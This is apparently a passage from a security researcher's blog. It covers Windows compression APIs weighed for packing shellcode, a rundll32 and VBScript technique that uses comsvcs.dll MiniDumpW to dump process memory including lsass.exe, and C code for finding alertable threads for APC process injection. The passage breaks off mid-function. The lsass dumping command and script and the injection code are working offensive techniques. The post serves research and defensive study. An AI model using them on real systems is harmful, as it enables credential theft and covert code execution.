    m = GetModuleHandle("ntdll");
    RtlGetCompressionWorkSpaceSize = (RtlGetCompressionWorkSpaceSize_t)GetProcAddress(m, "RtlGetCompressionWorkSpaceSize");
    RtlCompressBuffer              = (RtlCompressBuffer_t)GetProcAddress(m, "RtlCompressBuffer");
        
    if(RtlGetCompressionWorkSpaceSize == NULL || RtlCompressBuffer == NULL) {
      printf("Unable to resolve RTL API\n");
      return 0;
    }
        
    // 1. obtain the size of workspace
    nts = RtlGetCompressionWorkSpaceSize(
      engine | COMPRESSION_ENGINE_MAXIMUM, 
      &wspace, &fspace);
          
    if(nts == 0) {
      // 2. allocate memory for workspace
      ws = malloc(wspace); 
      if(ws != NULL) {
        // 3. allocate memory for output 
        outbuf = malloc(inlen);
        if(outbuf != NULL) {
          // 4. compress data
          nts = RtlCompressBuffer(
            engine | COMPRESSION_ENGINE_MAXIMUM, 
            inbuf, inlen, outbuf, inlen, 0, 
            (PULONG)&outlen, ws); 
              
          if(nts == 0) {
            // 5. write the original length
            WriteFile(outfile, &inlen, sizeof(DWORD), &len, 0);
            // 6. write compressed data to file
            WriteFile(outfile, outbuf, outlen, &len, 0);
          }
          // 7. free output buffer
          free(outbuf);
        }
        // 8. free workspace
        free(ws);
      }
    }
    return outlen;
}
  • Decompression

LZNT1 and Xpress data can be unpacked using RtlDecompressBuffer, however, Xpress Huffman data can only be unpacked using RtlDecompressBufferEx or the multi-threaded RtlDecompressBufferEx2. The last two require a WorkSpace buffer.

    typedef NTSTATUS (WINAPI *RtlDecompressBufferEx_t)(
      USHORT                 CompressionFormatAndEngine,
      PUCHAR                 UncompressedBuffer,
      ULONG                  UncompressedBufferSize,
      PUCHAR                 CompressedBuffer,
      ULONG                  CompressedBufferSize,
      PULONG                 FinalUncompressedSize,
      PVOID                  WorkSpace);
      
DWORD DecompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    ULONG                            wspace, fspace;
    SIZE_T                           outlen = 0;
    DWORD                            len;
    NTSTATUS                         nts;
    PVOID                            ws, outbuf;
    HMODULE                          m;
    RtlGetCompressionWorkSpaceSize_t RtlGetCompressionWorkSpaceSize;
    RtlDecompressBufferEx_t          RtlDecompressBufferEx;
      
    m = GetModuleHandle("ntdll");
    RtlGetCompressionWorkSpaceSize = (RtlGetCompressionWorkSpaceSize_t)GetProcAddress(m, "RtlGetCompressionWorkSpaceSize");
    RtlDecompressBufferEx          = (RtlDecompressBufferEx_t)GetProcAddress(m, "RtlDecompressBufferEx");
        
    if(RtlGetCompressionWorkSpaceSize == NULL || RtlDecompressBufferEx == NULL) {
      printf("Unable to resolve RTL API\n");
      return 0;
    }
        
    // 1. obtain the size of workspace
    nts = RtlGetCompressionWorkSpaceSize(
      engine | COMPRESSION_ENGINE_MAXIMUM, 
      &wspace, &fspace);
          
    if(nts == 0) {
      // 2. allocate memory for workspace
      ws = malloc(wspace); 
      if(ws != NULL) {
        // 3. allocate memory for output
        outlen = *(DWORD*)inbuf;
        outbuf = malloc(outlen);
        
        if(outbuf != NULL) {
          // 4. decompress data
          nts = RtlDecompressBufferEx(
            engine | COMPRESSION_ENGINE_MAXIMUM, 
            outbuf, outlen, 
            (PBYTE)inbuf + sizeof(DWORD), inlen - sizeof(DWORD), 
            (PULONG)&outlen, ws); 
              
          if(nts == 0) {
            // 5. write decompressed data to file
            WriteFile(outfile, outbuf, outlen, &len, 0);
          } else {
            printf("RtlDecompressBufferEx failed with %08lx\n", nts);
          }
          // 6. free output buffer
          free(outbuf);
        } else {
          printf("malloc() failed\n");
        }
        // 7. free workspace
        free(ws);
      }
    }
    return outlen;
}

3. Windows Compression API

Despite being well documented and offering better compression ratios than RtlCompressBuffer, it’s unusual to see these API used at all. Four engines are supported: MSZIP, Xpress, Xpress Huffman and LZMS. To demonstrate using these API, see xpress.c

Compression

DWORD CompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    COMPRESSOR_HANDLE ch = NULL;
    BOOL              r;
    SIZE_T            outlen, len;
    LPVOID            outbuf;
    DWORD             wr;
    
    // Create a compressor
    r = CreateCompressor(engine, NULL, &ch);
    
    if(r) {    
      // Query compressed buffer size.
      Compress(ch, inbuf, inlen, NULL, 0, &len);      
      if(GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
        // allocate memory for compressed data
        outbuf = malloc(len);
        if(outbuf != NULL) {
          // Compress data and write data to outbuf.
          r = Compress(ch, inbuf, inlen, outbuf, len, &outlen);
          // if compressed ok, write to file
          if(r) {
            WriteFile(outfile, outbuf, outlen, &wr, NULL);
          } else xstrerror("Compress()");
          free(outbuf);
        } else xstrerror("malloc()");
      } else xstrerror("Compress()");
      CloseCompressor(ch);
    } else xstrerror("CreateCompressor()");
    return r;
}

Decompression

DWORD DecompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    DECOMPRESSOR_HANDLE dh = NULL;
    BOOL                r;
    SIZE_T              outlen, len;
    LPVOID              outbuf;
    DWORD               wr;
    
    // Create a decompressor
    r = CreateDecompressor(engine, NULL, &dh);
    
    if(r) {    
      // Query Decompressed buffer size.
      Decompress(dh, inbuf, inlen, NULL, 0, &len);      
      if(GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
        // allocate memory for decompressed data
        outbuf = malloc(len);
        if(outbuf != NULL) {
          // Decompress data and write data to outbuf.
          r = Decompress(dh, inbuf, inlen, outbuf, len, &outlen);
          // if decompressed ok, write to file
          if(r) {
            WriteFile(outfile, outbuf, outlen, &wr, NULL);
          } else xstrerror("Decompress()");
          free(outbuf);
        } else xstrerror("malloc()");
      } else xstrerror("Decompress()");
      CloseDecompressor(dh);
    } else xstrerror("CreateDecompressor()");
    return r;
}

4. Windows Packaging API

If you’re a developer that wants to sell a Windows application to customers on the Microsoft Store, you must submit a package that uses the Open Packaging Conventions (OPC) format. Visual Studio automates building packages (.msix or .appx) and bundles (.msixbundle or .appxbundle). There’s also a well documented interface (IAppxFactory) that allows building them manually. While not intended to be used specifically for compression, there’s no reason why you can’t. An SDK sample to extract the contents of packages uses SHCreateStreamOnFileEx to read the package from disk. However, you can also use SHCreateMemStream and decompress a package entirely in memory.

5. Windows Imaging API (WIM)

These encode and decode .wim files on disk. WIMCreateFile internally calls CreateFile to return a file handle to an archive that’s then used with WIMCaptureImage to compress and add files to the archive. From what I can tell, there’s no way to work with .wim files in memory using these API.

For Linux, the Windows Imaging (WIM) library supports Xpress, LZX and LZMS algorithms. libmspack and this repo provide good information on the various compression algorithms supported by Windows.

6. Direct3D HLSL Compiler

Believe it or not, the best compression ratio on Windows is provided by the Direct3D API. Internally, they use the DXT/Block Compression (BC) algorithms, which are designed specifically for textures/images. The algorithms provide higher quality compression rates than anything else available on Windows. The compression ratio was 60% for a 1MB EXE file and using the API is very easy. The following example in C uses D3DCompressShaders and D3DDecompressShaders. While untested, I believe OpenGL API could likely be used in a similar way.

Compression

#pragma comment(lib, "D3DCompiler.lib")
#include <d3dcompiler.h>
uint32_t d3d_compress(const void *inbuf, uint32_t inlen) {
    
    D3D_SHADER_DATA dsa;
    HRESULT         hr;
    ID3DBlob        *blob;
    SIZE_T          outlen = 0;
    LPVOID          outbuf;
    HANDLE          file;
    DWORD           len;
    
    file = CreateFile("compressed.bin", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if(file == INVALID_HANDLE_VALUE) return 0;
    
    dsa.pBytecode      = inbuf;
    dsa.BytecodeLength = inlen;
    
    // compress data
    hr = D3DCompressShaders(1, &dsa, D3D_COMPRESS_SHADER_KEEP_ALL_PARTS, &blob);
    if(hr == S_OK) {
      // write to file
      outlen = blob->lpVtbl->GetBufferSize(blob);
      outbuf = blob->lpVtbl->GetBufferPointer(blob);
      
      WriteFile(file, outbuf, outlen, &len, 0);
      blob->lpVtbl->Release(blob);
    }
    CloseHandle(file);
    return outlen;
}

Decompression

uint32_t d3d_decompress(const void *inbuf, uint32_t inlen) {
    D3D_SHADER_DATA dsa;
    HRESULT         hr;
    ID3DBlob        *blob;
    SIZE_T          outlen = 0;
    LPVOID          outbuf;
    HANDLE          file;
    DWORD           len;
    
    // create file to save decompressed data to
    file = CreateFile("decompressed.bin", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if(file == INVALID_HANDLE_VALUE) return 0;
    
    dsa.pBytecode      = inbuf;
    dsa.BytecodeLength = inlen;
    
    // decompress buffer
    hr = D3DDecompressShaders(inbuf, inlen, 1, 0, 0, 0, &blob, NULL);
    if(hr == S_OK) {
      // write to file
      outlen = blob->lpVtbl->GetBufferSize(blob);
      outbuf = blob->lpVtbl->GetBufferPointer(blob);
      
      WriteFile(file, outbuf, outlen, &len, 0);
      blob->lpVtbl->Release(blob);
    }
    CloseHandle(file);
    return outlen;    
}

The main problem with dynamically resolving these API is knowing what version is installed. The file name on my Windows 10 system is “D3DCompiler_47.dll”. It will likely be different on legacy systems.

7. Windows-internal libarchive library

Since the release of Windows 10 build 17063, the tape archiving tool ‘bsdtar’ is available and uses a stripped down version of the open source Multi-format archive and compression library to create and extract compressed files both in memory and on disk. The version found on windows supports bzip2, compress and gzip formats. Although, bsdtar shows support for xz and lzma, at least on my system along with lzip, they appear to be unsupported.

8. LibreSSL Cryptography Library

Windows 10 Fall Creators Update and Windows Server 1709 include support for an OpenSSH client and server. The crypto library used by this port appears to have been compiled from the LibreSSL project, and if available can be found in C:\Windows\System32\libcrypto.dll. As some of you know, Transport Layer Security (TLS) supports compression prior to encryption. LibreSSL supports the ZLib and RLE methods, so it’s entirely possible to use COMP_compress_block and COMP_expand_block to compress and decompress raw data in memory.

9. Windows.Storage.Compression

This namespace located in Windows.Storage.Compress.dll internally uses Windows Compression API. CreateCompressor is invoked with the COMPRESS_RAW flag set. It also invokes SetCompressorInformation with COMPRESS_INFORMATION_CLASS_BLOCK_SIZE flag if the user specifies one in the Compressor method.

10. Windows Undocumented API

DLLs on Windows use the DEFLATE algorithm extensively to support various audio, video, image encoders/decoders and file archives. Normally, the deflate routines are used internally and can’t be resolved dynamically via GetProcAddress. However, between at least Windows 7 and 10 is a DLL called PresentationNative_v0300.dll that can be found in the C:\Windows\System32 directory. (There may also be PresentationNative_v0400.dll, but I haven’t investigated this thoroughly enough.) Four public symbols grabbed my attention, which are ums_deflate_init, ums_deflate, ums_inflate_init and ums_inflate. For a PoC demonstrating how to use them, see winflate.c

Compression

The following code uses zlib.h to compress a buffer and write to file.

DWORD CompressBuffer(LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    SIZE_T             outlen, len;
    LPVOID             outbuf;
    DWORD              wr;
    HMODULE            m;
    z_stream           ds;
    ums_deflate_t      ums_deflate;
    ums_deflate_init_t ums_deflate_init;
    int                err;
    
    m = LoadLibrary("PresentationNative_v0300.dll");
    ums_deflate_init = (ums_deflate_init_t)GetProcAddress(m, "ums_deflate_init");
    ums_deflate      = (ums_deflate_t)GetProcAddress(m, "ums_deflate");
    
    if(ums_deflate_init == NULL || ums_deflate == NULL) {
      printf("  [ unable to resolve deflate API.\n");
      return 0;
    }
    // allocate memory for compressed data
    outbuf = malloc(inlen);
    if(outbuf != NULL) {
      // Compress data and write data to outbuf.
      ds.zalloc    = Z_NULL;
      ds.zfree     = Z_NULL;
      ds.opaque    = Z_NULL;
      ds.avail_in  = (uInt)inlen;       // size of input
      ds.next_in   = (Bytef *)inbuf;    // input buffer
      ds.avail_out = (uInt)inlen;       // size of output buffer
      ds.next_out  = (Bytef *)outbuf;   // output buffer
      
      if(ums_deflate_init(&ds, Z_BEST_COMPRESSION, "1", sizeof(ds)) == Z_OK) {
        if((err = ums_deflate(&ds, Z_FINISH)) == Z_STREAM_END) {
          // write the original length first
          WriteFile(outfile, &inlen, sizeof(DWORD), &wr, NULL);
          // then the data
          WriteFile(outfile, outbuf, ds.avail_out, &wr, NULL);
          FlushFileBuffers(outfile);
        } else {
          printf("  [ ums_deflate() : %x\n", err);
        }
      } else {
        printf("  [ ums_deflate_init()\n");
      }
      free(outbuf);
    }
    return 0;
}

Decompression

Inflating/decompressing the data is based on an example using zlib.

DWORD DecompressBuffer(LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    SIZE_T             outlen, len;
    LPVOID             outbuf;
    DWORD              wr;
    HMODULE            m;
    z_stream           ds;
    ums_inflate_t      ums_inflate;
    ums_inflate_init_t ums_inflate_init;
    
    m = LoadLibrary("PresentationNative_v0300.dll");
    ums_inflate_init = (ums_inflate_init_t)GetProcAddress(m, "ums_inflate_init");
    ums_inflate      = (ums_inflate_t)GetProcAddress(m, "ums_inflate");
    
    if(ums_inflate_init == NULL || ums_inflate == NULL) {
      printf("  [ unable to resolve inflate API.\n");
      return 0;
    }
    // allocate memory for decompressed data
    outlen = *(DWORD*)inbuf;
    outbuf = malloc(outlen*2);
    
    if(outbuf != NULL) {
      // decompress data and write data to outbuf.
      ds.zalloc    = Z_NULL;
      ds.zfree     = Z_NULL;
      ds.opaque    = Z_NULL;
      ds.avail_in  = (uInt)inlen - 8;       // size of input
      ds.next_in   = (Bytef*)inbuf + 4;     // input buffer
      ds.avail_out = (uInt)outlen*2;        // size of output buffer
      ds.next_out  = (Bytef*)outbuf;        // output buffer
      
      printf("  [ initializing inflate...\n");
      if(ums_inflate_init(&ds, "1", sizeof(ds)) == Z_OK) {
        printf("  [ inflating...\n");
        if(ums_inflate(&ds, Z_FINISH) == Z_STREAM_END) {
          WriteFile(outfile, outbuf, ds.avail_out, &wr, NULL);
          FlushFileBuffers(outfile);
        } else {
          printf("  [ ums_inflate()\n");
        }
      } else {
        printf("  [ ums_inflate_init()\n");
      }
      free(outbuf);
    } else {
      printf("  [ malloc()\n");
    }
    return 0;
}

11. Summary/Results

That sums up the algorithms I think are suitable for a shellcode. For the moment, UCL and apultra seem to provide the best solution. Using Windows API is a good option. They are also susceptible to monitoring and may not be portable. One area I didn’t cover due to time is Media Foundation API. It may be possible to use audio, video and image encoders to compress raw data and the decoders to decompress. Worth researching?

Library / API Algorithm / Engine Compression Ratio
RtlCompressBuffer LZNT1 39%
RtlCompressBuffer Xpress 47%
RtlCompressBuffer Xpress Huffman 53%
Compress MSZIP 55%
Compress Xpress 40%
Compress Xpress Huffman 48%
Compress LZMS 58%
D3DCompressShaders DXT/BC 60%
aPLib N/A 45%
UCL N/A 42%
Undocumented API DEFLATE 46%
Posted in assembly, compression, linux, malware, programming, security, shellcode, windows | Tagged , , , , | 2 Comments

MiniDumpWriteDump via COM+ Services DLL

Introduction

This will be a very quick code-oriented post about a DLL function exported by comsvcs.dll that I was unable to find any reference to online.

UPDATE: Memory Dump Analysis Anthology Volume 1 that was published in 2008 by Dmitry Vostokov, discusses this function in a chapter on COM+ Crash Dumps. The reason I didn’t find it before is because I was searching for “MiniDumpW” and not “MiniDump”.

While searching for DLL/EXE that imported DBGHELP!MiniDumpWriteDump, I discovered comsvcs.dll exports a function called MiniDumpW which appears to have been designed specifically for use by rundll32. It will accept three parameters but the first two are ignored. The third parameter should be a UNICODE string combining three tokens/parameters wrapped in quotation marks. The first is the process id, the second is where to save the memory dump and third requires the keyword “full” even though there’s no alternative for this last parameter.

To use from the command line, type the following: "rundll32 C:\windows\system32\comsvcs.dll MiniDump "1234 dump.bin full"" where “1234” is the target process to dump. Obviously, this assumes you have permission to query and read the memory of target process. If COMSVCS!MiniDumpW encounters an error, it simply calls KERNEL32!ExitProcess and you won’t see anything. The following code in C demonstrates how to invoke it dynamically.

BTW, HRESULT is probably the wrong return type. Internally it exits the process with E_INVALIDARG if it encounters a problem with the parameters, but if it succeeds, it returns 1. S_OK is defined as 0.

#define UNICODE
#include <windows.h>
#include <stdio.h>

typedef HRESULT (WINAPI *_MiniDumpW)(
  DWORD arg1, DWORD arg2, PWCHAR cmdline);
  
typedef NTSTATUS (WINAPI *_RtlAdjustPrivilege)(
  ULONG Privilege, BOOL Enable, 
  BOOL CurrentThread, PULONG Enabled);

// "<pid> <dump.bin> full"
int wmain(int argc, wchar_t *argv[]) {
    HRESULT             hr;
    _MiniDumpW          MiniDumpW;
    _RtlAdjustPrivilege RtlAdjustPrivilege;
    ULONG               t;
    
    MiniDumpW          = (_MiniDumpW)GetProcAddress(
      LoadLibrary(L"comsvcs.dll"), "MiniDumpW");
      
    RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(
      GetModuleHandle(L"ntdll"), "RtlAdjustPrivilege");
    
    if(MiniDumpW == NULL) {
      printf("Unable to resolve COMSVCS!MiniDumpW.\n");
      return 0;
    }
    // try enable debug privilege
    RtlAdjustPrivilege(20, TRUE, FALSE, &t);
        
    printf("Invoking COMSVCS!MiniDumpW(\"%ws\")\n", argv[1]);
   
    // dump process
    MiniDumpW(0, 0,  argv[1]);
    printf("OK!\n");
    
    return 0;
}

Since neither rundll32 nor comsvcs!MiniDumpW will enable the debugging privilege required to access lsass.exe, the following VBscript will work in an elevated process.

Option Explicit

Const SW_HIDE = 0

If (WScript.Arguments.Count <> 1) Then
    WScript.StdOut.WriteLine("procdump - Copyright (c) 2019 odzhan")
    WScript.StdOut.WriteLine("Usage: procdump <process>")
    WScript.Quit
Else
    Dim fso, svc, list, proc, startup, cfg, pid, str, cmd, query, dmp
    
    ' get process id or name
    pid = WScript.Arguments(0)
    
    ' connect with debug privilege
    Set fso  = CreateObject("Scripting.FileSystemObject")
    Set svc  = GetObject("WINMGMTS:{impersonationLevel=impersonate, (Debug)}")
    
    ' if not a number
    If(Not IsNumeric(pid)) Then
      query = "Name"
    Else
      query = "ProcessId"
    End If
    
    ' try find it
    Set list = svc.ExecQuery("SELECT * From Win32_Process Where " & _
      query & " = '" & pid & "'")
    
    If (list.Count = 0) Then
      WScript.StdOut.WriteLine("Can't find active process : " & pid)
      WScript.Quit()
    End If

    For Each proc in list
      pid = proc.ProcessId
      str = proc.Name
      Exit For
    Next

    dmp = fso.GetBaseName(str) & ".bin"
    
    ' if dump file already exists, try to remove it
    If(fso.FileExists(dmp)) Then
      WScript.StdOut.WriteLine("Removing " & dmp)
      fso.DeleteFile(dmp)
    End If
    
    WScript.StdOut.WriteLine("Attempting to dump memory from " & _
      str & ":" & pid & " to " & dmp)
    
    Set proc       = svc.Get("Win32_Process")
    Set startup    = svc.Get("Win32_ProcessStartup")
    Set cfg        = startup.SpawnInstance_
    cfg.ShowWindow = SW_HIDE

    cmd = "rundll32 C:\windows\system32\comsvcs.dll, MiniDump " & _
          pid & " " & fso.GetAbsolutePathName(".") & "\" & _
          dmp & " full"
    
    Call proc.Create (cmd, null, cfg, pid)
    
    ' sleep for a second
    Wscript.Sleep(1000)
    
    If(fso.FileExists(dmp)) Then
      WScript.StdOut.WriteLine("Memory saved to " & dmp)
    Else
      WScript.StdOut.WriteLine("Something went wrong.")
    End If
End If

Run from elevated cmd prompt.

No idea how useful this could be, but since it’s part of the operating system, it’s probably worth knowing anyway. Perhaps you will find similar functions in signed binaries that perform memory dumping of a target process. 🙂

Posted in windows | Tagged , , , | 1 Comment

Windows Process Injection: Asynchronous Procedure Call (APC)

Introduction

An early example of APC injection can be found in a 2005 paper by the late Barnaby Jack called Remote Windows Kernel Exploitation – Step into the Ring 0. Until now, these posts have focused on relatively new, lesser-known injection techniques. A factor in not covering APC injection before is the lack of a single user-mode API to identify alertable threads. Many have asked “how to identify an alertable thread” and were given an answer that didn’t work or were told it’s not possible. This post will examine two methods that both use a combination of user-mode API to identify them. The first was described in 2016 and the second was suggested earlier this month at Blackhat and Defcon.

Alertable Threads

A number of Windows API and the underlying system calls support asynchronous operations and specifically I/O completion routines.. A boolean parameter tells the kernel a calling thread should be alertable, so I/O completion routines for overlapped operations can still run in the background while waiting for some other event to become signalled. Completion routines or callback functions are placed in the APC queue and executed by the kernel via NTDLL!KiUserApcDispatcher. The following Win32 API can set threads to alertable.

A few others rarely mentioned involve working with files or named pipes that might be read or written to using overlapped operations. e.g ReadFile.

Unfortunately, there’s no single user-mode API to determine if a thread is alertable. From the kernel, the KTHREAD structure has an Alertable bit, but from user-mode there’s nothing similar, at least not that I’m aware of.

Method 1

First described and used by Tal Liberman in a technique he invented called AtomBombing.

…create an event for each thread in the target process, then ask each thread to set its corresponding event. … wait on the event handles, until one is triggered. The thread whose corresponding event was triggered is an alertable thread.

Based on this description, we take the following steps:

  1. Enumerate threads in a target process using Thread32First and Thread32Next. OpenThread and save the handle to an array not exceeding MAXIMUM_WAIT_OBJECTS.
  2. CreateEvent for each thread and DuplicateHandle for the target process.
  3. QueueUserAPC for each thread that will execute SetEvent on the handle duplicated in step 2.
  4. WaitForMultipleObjects until one of the event handles becomes signalled.
  5. The first event signalled is from an alertable thread.

MAXIMUM_WAIT_OBJECTS is defined as 64 which might seem like a limitation, but how likely is it for processes to have more than 64 threads and not one alertable?

HANDLE find_alertable_thread1(HANDLE hp, DWORD pid) {
    DWORD         i, cnt = 0;
    HANDLE        evt[2], ss, ht, h = NULL, 
      hl[MAXIMUM_WAIT_OBJECTS],
      sh[MAXIMUM_WAIT_OBJECTS],
      th[MAXIMUM_WAIT_OBJECTS];
    THREADENTRY32 te;
    HMODULE       m;
    LPVOID        f, rm;
    
    // 1. Enumerate threads in target process
    ss = CreateToolhelp32Snapshot(
      TH32CS_SNAPTHREAD, 0);
      
    if(ss == INVALID_HANDLE_VALUE) return NULL;

    te.dwSize = sizeof(THREADENTRY32);
    
    if(Thread32First(ss, &te)) {
      do {
        // if not our target process, skip it
        if(te.th32OwnerProcessID != pid) continue;
        // if we can't open thread, skip it
        ht = OpenThread(
          THREAD_ALL_ACCESS, 
          FALSE, 
          te.th32ThreadID);
          
        if(ht == NULL) continue;
        // otherwise, add to list
        hl[cnt++] = ht;
        // if we've reached MAXIMUM_WAIT_OBJECTS. break
        if(cnt == MAXIMUM_WAIT_OBJECTS) break;
      } while(Thread32Next(ss, &te));
    }

    // Resolve address of SetEvent
    m  = GetModuleHandle(L"kernel32.dll");
    f  = GetProcAddress(m, "SetEvent");
    
    for(i=0; i<cnt; i++) {
      // 2. create event and duplicate in target process
      sh[i] = CreateEvent(NULL, FALSE, FALSE, NULL);
      
      DuplicateHandle(
        GetCurrentProcess(),  // source process
        sh[i],                // source handle to duplicate
        hp,                   // target process
        &th[i],               // target handle
        0, 
        FALSE, 
        DUPLICATE_SAME_ACCESS);
        
      // 3. Queue APC for thread passing target event handle
      QueueUserAPC(f, hl[i], (ULONG_PTR)th[i]);
    }

    // 4. Wait for event to become signalled
    i = WaitForMultipleObjects(cnt, sh, FALSE, 1000);
    if(i != WAIT_TIMEOUT) {
      // 5. save thread handle
      h = hl[i];
    }
    
    // 6. Close source + target handles
    for(i=0; i<cnt; i++) {
      CloseHandle(sh[i]);
      CloseHandle(th[i]);
      if(hl[i] != h) CloseHandle(hl[i]);
    }
    CloseHandle(ss);
    return h;
}

Method 2

At Blackhat and Defcon 2019, Itzik Kotler and Amit Klein presented Process Injection Techniques – Gotta Catch Them All. They suggested alertable threads can be detected by simply reading the context of a remote thread and examining the control and integer registers. There’s currently no code in their pinjectra tool to perform this, so I decided to investigate how it might be implemented in practice.

If you look at the disassembly of KERNELBASE!SleepEx on Windows 10 (shown in figure 1), you can see it invokes the NT system call, NTDLL!ZwDelayExecution.

Figure 1. Disassembly of SleepEx on Windows 10.

The system call wrapper (shown in figure 2) executes a syscall instruction which transfers control from user-mode to kernel-mode. If we read the context of a thread that called KERNELBASE!SleepEx, the program counter (Rip on AMD64) should point to NTDLL!ZwDelayExecution + 0x14 which is the address of the RETN opcode.

Figure 2. Disassembly of NTDLL!ZwDelayExecution on Windows 10.

This address can be used to determine if a thread has called KERNELBASE!SleepEx. To calculate it, we have two options. Add a hardcoded offset to the address returned by GetProcAddress for NTDLL!ZwDelayExecution or read the program counter after calling KERNELBASE!SleepEx from our own artificial thread.

For the second option, a simple application was written to run a thread and call asynchronous APIs with alertable parameter set to TRUE. In between each invocation, GetThreadContext is used to read the program counter (Rip on AMD64) which will hold the return address after the system call has completed. This address can then be used in the first step of detection. Figure 3 shows output of this.

Figure 3. Win32 API and NT System Call Wrappers.

The following table matches Win32 APIs with NT system call wrappers. The parameters are included for reference.

Win32 API NT System Call
SleepEx ZwDelayExecution(BOOLEAN Alertable, PLARGE_INTEGER DelayInterval);
WaitForSingleObjectEx
GetOverlappedResultEx
ZwWaitForSingleObject(HANDLE Handle, BOOLEAN Alertable, PLARGE_INTEGER Timeout);
WaitForMultipleObjectsEx
WSAWaitForMultipleEvents
NtWaitForMultipleObjects(ULONG ObjectCount, PHANDLE ObjectsArray, OBJECT_WAIT_TYPE WaitType, DWORD Timeout, BOOLEAN Alertable, PLARGE_INTEGER Timeout);
SignalObjectAndWait NtSignalAndWaitForSingleObject(HANDLE SignalHandle, HANDLE WaitHandle, BOOLEAN Alertable, PLARGE_INTEGER Timeout);
MsgWaitForMultipleObjectsEx NtUserMsgWaitForMultipleObjectsEx(ULONG ObjectCount, PHANDLE ObjectsArray, DWORD Timeout, DWORD WakeMask, DWORD Flags);
GetQueuedCompletionStatusEx NtRemoveIoCompletionEx(HANDLE Port, FILE_IO_COMPLETION_INFORMATION *Info, ULONG Count, ULONG *Written, LARGE_INTEGER *Timeout, BOOLEAN Alertable);

The second step of detection involves reading the register that holds the Alertable parameter. NT system calls use the Microsoft fastcall convention. The first four arguments are placed in RCX, RDX, R8 and R9 with the remainder stored on the stack. Figure 4 shows the Win64 stack layout. The first index of the stack register (Rsp) will contain the return address of caller, the next four will be the shadow, spill or home space to optionally save RCX, RDX, R8 and R9. The fifth, sixth and subsequent arguments to the system call appear after this.

Figure 4. Win64 Stack Layout.

Based on the prototypes shown in the above table, to determine if a thread is alertable, verify the register holding the Alertable parameter is TRUE or FALSE. The following code performs this.

BOOL IsAlertable(HANDLE hp, HANDLE ht, LPVOID addr[6]) {
    CONTEXT   c;
    BOOL      alertable = FALSE;
    DWORD     i;
    ULONG_PTR p[8];
    SIZE_T    rd;
    
    // read the context
    c.ContextFlags = CONTEXT_INTEGER | CONTEXT_CONTROL;
    GetThreadContext(ht, &c);
    
    // for each alertable function
    for(i=0; i<6 && !alertable; i++) {
      // compare address with program counter
      if((LPVOID)c.Rip == addr[i]) {
        switch(i) {
          // ZwDelayExecution
          case 0 : {
            alertable = (c.Rcx & TRUE);
            break;
          }
          // NtWaitForSingleObject
          case 1 : {
            alertable = (c.Rdx & TRUE);
            break;
          }
          // NtWaitForMultipleObjects
          case 2 : {
            alertable = (c.Rsi & TRUE);
            break;
          }
          // NtSignalAndWaitForSingleObject
          case 3 : {
            alertable = (c.Rsi & TRUE);
            break;
          }
          // NtUserMsgWaitForMultipleObjectsEx
          case 4 : {
            ReadProcessMemory(hp, (LPVOID)c.Rsp, p, sizeof(p), &rd);
            alertable = (p[5] & MWMO_ALERTABLE);
            break;
          }
          // NtRemoveIoCompletionEx
          case 5 : {
            ReadProcessMemory(hp, (LPVOID)c.Rsp, p, sizeof(p), &rd);
            alertable = (p[6] & TRUE);
            break;
          }            
        }
      }
    }
    return alertable;
}

You might be asking why Rsi is checked for two of the calls despite not being used for a parameter by the Microsoft fastcall convention. This is a callee saved non-volatile register that should be preserved by any function that uses it. RCX, RDX, R8 and R9 are volatile registers and don’t need to be preserved. It just so happens the kernel overwrites R9 for NtWaitForMultipleObjects (shown in figure 5) and R8 for NtSignalAndWaitForSingleObject (shown in figure 6) hence the reason for checking Rsi instead. BOOLEAN is defined as an 8-bit type, so a mask of the register is performed before comparing with TRUE or FALSE.

Figure 5. Rsi used for Alertable Parameter to NtWaitForMultipleObjects.

Figure 6. Rsi used to for Alertable parameter to NtSignalAndWaitForSingleObject.

The following code can support adding an offset or reading the thread context before enumerating threads.

// thread to run alertable functions
DWORD WINAPI ThreadProc(LPVOID lpParameter) {
    HANDLE           *evt = (HANDLE)lpParameter;
    HANDLE           port;
    OVERLAPPED_ENTRY lap;
    DWORD            n;
    
    SleepEx(INFINITE, TRUE);
    
    WaitForSingleObjectEx(evt[0], INFINITE, TRUE);
    
    WaitForMultipleObjectsEx(2, evt, FALSE, INFINITE, TRUE);
    
    SignalObjectAndWait(evt[1], evt[0], INFINITE, TRUE);
    
    ResetEvent(evt[0]);
    ResetEvent(evt[1]);
    
    MsgWaitForMultipleObjectsEx(2, evt, 
      INFINITE, QS_RAWINPUT, MWMO_ALERTABLE);
      
    port = CreateIoCompletionPort(INVALID_HANDLE_VALUE, NULL, 0, 0);
    GetQueuedCompletionStatusEx(port, &lap, 1, &n, INFINITE, TRUE);
    CloseHandle(port);
    
    return 0;
}

HANDLE find_alertable_thread2(HANDLE hp, DWORD pid) {
    HANDLE        ss, ht, evt[2], h = NULL;
    LPVOID        rm, sevt, f[6];
    THREADENTRY32 te;
    SIZE_T        rd;
    DWORD         i;
    CONTEXT       c;
    ULONG_PTR     p;
    HMODULE       m;
    
    // using the offset requires less code but it may
    // not work across all systems.
#ifdef USE_OFFSET
    char *api[6]={
      "ZwDelayExecution", 
      "ZwWaitForSingleObject",
      "NtWaitForMultipleObjects",
      "NtSignalAndWaitForSingleObject",
      "NtUserMsgWaitForMultipleObjectsEx",
      "NtRemoveIoCompletionEx"};
      
    // 1. Resolve address of alertable functions
    for(i=0; i<6; i++) {
      m = GetModuleHandle(i == 4 ? L"win32u" : L"ntdll");
      f[i] = (LPBYTE)GetProcAddress(m, api[i]) + 0x14;
    }
#else
    // create thread to execute alertable functions
    evt[0] = CreateEvent(NULL, FALSE, FALSE, NULL);
    evt[1] = CreateEvent(NULL, FALSE, FALSE, NULL);
    ht     = CreateThread(NULL, 0, ThreadProc, evt, 0, NULL);
    
    // wait a moment for thread to initialize
    Sleep(100);
    
    // resolve address of SetEvent
